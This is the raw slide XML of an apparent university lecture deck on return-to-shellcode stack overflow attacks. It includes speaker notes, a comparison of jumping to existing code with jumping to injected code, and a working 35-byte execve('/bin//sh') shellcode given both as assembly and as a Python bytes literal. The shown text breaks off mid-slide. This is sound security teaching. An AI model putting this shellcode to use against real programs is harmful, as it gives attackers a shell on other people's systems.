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324956ea5d234d03" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="R79d19e49a6444dda" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="Rdca02fe77bd94a59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7b8131a44b74bcb"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="Rb300a71c2fcd4c30"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="256" ns0:id="rId7"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="257" ns0:id="rId8"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="258" ns0:id="rId9"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="259" ns0:id="rId10"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="260" ns0:id="rId11"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="261" ns0:id="rId12"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="262" ns0:id="rId13"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="263" ns0:id="rId14"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="264" ns0:id="rId15"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="265" ns0:id="rId16"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="266" ns0:id="rId17"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="267" ns0:id="rId18"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="268" ns0:id="rId19"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="269" ns0:id="rId20"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="270" ns0:id="rId21"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="271" ns0:id="rId22"/>
    <p:sldId xmlns:ns0="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="272" ns0:id="rId23"/>
  </p:sldIdLst>
  <p:sldSz cx="9144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1931b91f2aed48dd" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="R27b8131a44b74bcb" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster1.xml"/><Relationship Id="R66dc9ec30dc34184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps.xml"/><Relationship Id="R7752031efbc64484" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.xml"/><Relationship Id="Ra553c2f116224f3b" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles.xml"/><Relationship Id="Rb300a71c2fcd4c30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c038b810ef6e4844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Standard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Sequence adapted from the instructor's prior Software Security course, Chapter 8. Shellcode itself is our own, from Class 7's execve_stack.asm — not ss2024's Aleph One example — to keep the course's own thread going.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ss2024 ch08 p1 ('Review'). Step 3 of the bug→vulnerability model (ch08 p41-43): execute payload.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ss2024 ch07 p37 ('Classic Exploitation Technique': call hacked() vs write our own shellcode). This slide makes that contrast explicit for students.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code/class07_shellcode/execve_stack.asm, reused verbatim. No ss2024 source here — deliberate continuity with last week's lecture instead.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Continues Class 7's bin_to_header.py workflow; ss2024 equivalent is ch08 p14-18 (hello.asm → nasm → objdump → bytes), but with our own asm source.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ss2024 ch07 p23 ('Jump to Shellcode': 'we put some code in the buffer and set the return address to point to it').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ss2024 ch08 p26 (Overflow2.c, char array[50]). Widened to 80 in our version to comfortably fit a NOP sled ahead of the 35-byte shellcode.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ss2024 ch07 p18 ('Guessing Addresses': 'an estimate is often good enough!'). ASLR/PIE mechanics are Week 6 — keep this pragmatic, not theoretical.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ss2024 ch07 p28-29 / ch08 p22-23 ('NOP slide'/'NOP sled') — cartoon NOP-spiral graphic skipped, kept the payload-shape diagram instead.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ss2024 ch07 p24-29 / ch08 p20-26 ('Finding a possible place to inject shellcode', NOP sled, estimating stack size) — collapsed into one payload-layout diagram.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ss2024 ch08 p28 ('Exploit Script') restructured around our own shellcode bytes and GEF-style workflow.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Matches the Class 8 demo-checklist format. Use the section's own binary and addresses captured live in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ss2024 ch07 p33-37 / ch08 p29-33 ('Classic Exploitation Illustration', progressive green/red table) — redrawn as a single annotated snapshot.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New synthesis slide, no direct ss2024 source — ties the two-lecture split back together per the instructor's requested Class 8/9 structure.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Deliberately brief — NX/DEP mechanics (ch08 p34-40, page tables, NX bit) are Week 6 material per the Fall 2026 syllabus, not this lecture.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Ties directly to the Fall 2026 tentative schedule: Week 5 → Quiz 2 + Lab 2; Week 6 → NX/DEP.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Mirrors Class07/Class08's references layout. ss2024 source: ch08 p14-33 (shellcode crafting through classic exploitation illustration).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22776b0cc75e4829" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.jpeg"/><Relationship Id="R38b6ce4b89ef40c4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6c847c2955614f89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.jpeg"/><Relationship Id="Rd507bf037ef24bd2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21db076516244742" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.jpeg"/><Relationship Id="R5dd3858852804eee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4ed5a8e400d04e10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2e042b3e947f428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188e5766500a4d40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d224c154301942cd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34b671f00b35416d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8276271825d641a5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c20543eda370463a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9ea43659318f440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showMasterSp="0" type="title" preserve="1">
  <p:cSld name="标题幻灯片">
    <p:bg>
      <p:bgPr>
        <a:blipFill xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="R22776b0cc75e4829"/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.xml><?xml version="1.0" encoding="utf-8"?>
<p:sldLayout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847c2955614f8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648700" y="6065721"/>
            <a:ext cx="495300" cy="80962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.xml><?xml version="1.0" encoding="utf-8"?>
<p:sldLayout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db07651624474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648700" y="6065721"/>
            <a:ext cx="495300" cy="80962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.xml><?xml version="1.0" encoding="utf-8"?>
<p:sldLayout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5.xml><?xml version="1.0" encoding="utf-8"?>
<p:sldLayout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6.xml><?xml version="1.0" encoding="utf-8"?>
<p:sldLayout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7.xml><?xml version="1.0" encoding="utf-8"?>
<p:sldLayout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8.xml><?xml version="1.0" encoding="utf-8"?>
<p:sldLayout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9.xml><?xml version="1.0" encoding="utf-8"?>
<p:sldLayout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10.xml><?xml version="1.0" encoding="utf-8"?>
<p:sldLayout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11.xml><?xml version="1.0" encoding="utf-8"?>
<p:sldLayout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Id="R09d22cbabc434f27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="R1b00ab6e8a4c4254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.xml"/><Relationship Id="R3e47e2d7986f4bff" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme2.xml"/><Relationship Id="R43bf1cbbaf5f4f79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="R465046500aa74df6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout9.xml"/><Relationship Id="R63b2f1703b2c4cad" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout11.xml"/><Relationship Id="Ra99b01b456ce4dd4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout8.xml"/><Relationship Id="Rae7d864d5fcb42ab" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="Raf1946e829e9496d" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="Rd00a49c570184981" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout10.xml"/><Relationship Id="Rda875a7d83e74055" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.xml"/><Relationship Id="Re72ad7413aa44fdf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image.jpeg"/><Relationship Id="Rfc51e07cc33f4f0a" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/slideMaster1.xml><?xml version="1.0" encoding="utf-8"?>
<p:sldMaster xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:cSld>
    <p:bg>
      <p:bgPr>
        <a:blipFill xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="Re72ad7413aa44fdf"/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e7d864d5fcb42ab"/>
    <p:sldLayoutId xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="2147483650" r:id="Rfc51e07cc33f4f0a"/>
    <p:sldLayoutId xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="2147483651" r:id="R09d22cbabc434f27"/>
    <p:sldLayoutId xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="2147483652" r:id="R43bf1cbbaf5f4f79"/>
    <p:sldLayoutId xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="2147483653" r:id="Raf1946e829e9496d"/>
    <p:sldLayoutId xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="2147483654" r:id="R1b00ab6e8a4c4254"/>
    <p:sldLayoutId xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="2147483655" r:id="Rda875a7d83e74055"/>
    <p:sldLayoutId xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="2147483656" r:id="Ra99b01b456ce4dd4"/>
    <p:sldLayoutId xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="2147483657" r:id="R465046500aa74df6"/>
    <p:sldLayoutId xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="2147483658" r:id="Rd00a49c570184981"/>
    <p:sldLayoutId xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="2147483659" r:id="R63b2f1703b2c4cad"/>
  </p:sldLayoutIdLst>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" algn="l">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buNone/>
        <a:defRPr sz="2600" b="1">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-lt"/>
          <a:cs typeface="+mj-lt"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" algn="l">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buNone/>
        <a:defRPr sz="2600" b="1">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="Arial"/>
          <a:cs typeface="Arial"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" algn="l">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buNone/>
        <a:defRPr sz="2600" b="1">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="Arial"/>
          <a:cs typeface="Arial"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" algn="l">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buNone/>
        <a:defRPr sz="2600" b="1">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="Arial"/>
          <a:cs typeface="Arial"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" algn="l">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buNone/>
        <a:defRPr sz="2600" b="1">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="Arial"/>
          <a:cs typeface="Arial"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" marL="457200" algn="l">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buNone/>
        <a:defRPr sz="2600" b="1">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="Arial"/>
          <a:cs typeface="Arial"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" marL="914400" algn="l">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buNone/>
        <a:defRPr sz="2600" b="1">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="Arial"/>
          <a:cs typeface="Arial"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" marL="1371600" algn="l">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buNone/>
        <a:defRPr sz="2600" b="1">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="Arial"/>
          <a:cs typeface="Arial"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" marL="1828800" algn="l">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buNone/>
        <a:defRPr sz="2600" b="1">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="Arial"/>
          <a:cs typeface="Arial"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" marL="180975" indent="-180975" algn="l">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="40000"/>
        </a:spcAft>
        <a:buFont typeface="Wingdings"/>
        <a:buChar char="§"/>
        <a:defRPr sz="20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44500" indent="-261938" algn="l">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="40000"/>
        </a:spcAft>
        <a:buChar char="–"/>
        <a:defRPr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720725" indent="-274638" algn="l">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="40000"/>
        </a:spcAft>
        <a:buChar char="•"/>
        <a:defRPr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987425" indent="-265113" algn="l">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="40000"/>
        </a:spcAft>
        <a:buChar char="–"/>
        <a:defRPr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254125" indent="-265113" algn="l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1711325" indent="-265113" algn="l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168525" indent="-265113" algn="l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2625725" indent="-265113" algn="l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082925" indent="-265113" algn="l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Standard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9509" y="3823844"/>
            <a:ext cx="3164491" cy="21064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9000" y="200025"/>
            <a:ext cx="16002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2625" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>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0" y="685800"/>
            <a:ext cx="16002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6450" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="247793"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rP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2450" y="1514475"/>
            <a:ext cx="8039100" cy="5905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3450" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>CSC 472 Software Security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2450" y="2257425"/>
            <a:ext cx="8039100" cy="53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2925" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Return-to-Shellcode Attack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2450" y="2895600"/>
            <a:ext cx="8039100" cy="4476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2175" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Dr. Si Chen (schen@wcupa.edu)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2450" y="6000750"/>
            <a:ext cx="8039100" cy="6762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75" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="D8DEE6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Tue / Thu · 2:00–3:15 PM · 25 University Ave., Room 158</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1275" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="D8DEE6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Fall 2026 · Week 5 · Thursday, September 24, 2026</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1275" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="D8DEE6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>WolfCTF + GDB / GEF · wcu.ninja/csc472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Same crash, new destination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2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9100" y="1190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Tuesday's move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9100" y="1571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Overflow the buffer, overwrite the return address, jump to a function that already exists (hacked()).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9100" y="2333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Today's move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100" y="2714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Same overflow, same offset-finding technique — but we jump into code we wrote ourselves.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9100" y="3476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The code is ready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9100" y="3857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It's the execve("/bin//sh") shellcode you built by hand in Class 7.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9100" y="4619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The only new idea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9100" y="5000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Where do we put our code, and how do we point EIP at it reliably?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Two ways to redirect execution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3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9100" y="1190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Jump to existing code — Class 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9100" y="1571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The return address points at hacked(), a function the compiler already placed in the binary. Simple, but limited to whatever code already happens to exist.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9100" y="2620000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Jump to injected code — today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100" y="3001000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The return address points back into the buffer itself, where WE placed our own machine code. Whatever we can assemble, we can run.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9100" y="4050000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Same underlying bug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9100" y="4431000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Both attacks exploit the identical missing bounds check in return_input(). Only the payload and the target address change.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Our shellcode — already built, Class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4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19100" y="1047750"/>
            <a:ext cx="4600000" cy="5300000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="11151C"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="7883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19100" y="1047750"/>
            <a:ext cx="4600000" cy="76200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2477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1266825"/>
            <a:ext cx="4180900" cy="3429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75" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="B7DDD2"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>execve_stack.asm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1771650"/>
            <a:ext cx="4180900" cy="43665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50" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="E6F4EF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>_start:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1450" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="E6F4EF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    xor eax, eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1450" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="E6F4EF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    push eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1450" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="E6F4EF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    push 0x68732f2f    ; "//sh"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1450" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="E6F4EF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    push 0x6e69622f    ; "/bin"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1450" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="E6F4EF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    mov ebx, esp        ; "/bin//sh"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1450" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="E6F4EF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    push eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1450" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="E6F4EF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    mov edx, esp   ; envp = NULL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1450" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="E6F4EF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    push eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1450" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="E6F4EF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    push ebx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1450" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="E6F4EF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    mov ecx, esp        ; argv</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1450" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="E6F4EF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    mov al, 11           ; execve</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1450" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="E6F4EF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    int 0x80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50000" y="1150000"/>
            <a:ext cx="3474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35 bytes, no NUL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50000" y="1531000"/>
            <a:ext cx="3474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This is the exact file you assembled and extracted with bin_to_header.py — we are not writing new shellcode today, only a new delivery mechanism.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50000" y="3050000"/>
            <a:ext cx="3474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What it does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50000" y="3431000"/>
            <a:ext cx="3474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execve("/bin//sh", argv, envp) — replaces the current process with a shell.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From bytes to payload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5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19100" y="1047750"/>
            <a:ext cx="8305800" cy="1750000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="11151C"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="7883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19100" y="1047750"/>
            <a:ext cx="8305800" cy="76200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2477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1266825"/>
            <a:ext cx="7886700" cy="3429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75" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="B7DDD2"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>the 35 shellcode bytes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1771650"/>
            <a:ext cx="7886700" cy="8165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 i="0">
                <a:solidFill>
                  <a:srgbClr val="E6F4EF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>shellcode = (</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="E6F4EF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="E6F4EF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    b"\x89\xe3\x50\x89\xe2\x50\x53\x89\xe1\xb0\x0b\xcd\x80"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="E6F4EF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    b"\x31\xc0\xb0\x01\x31\xdb\x43\xcd\x80"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
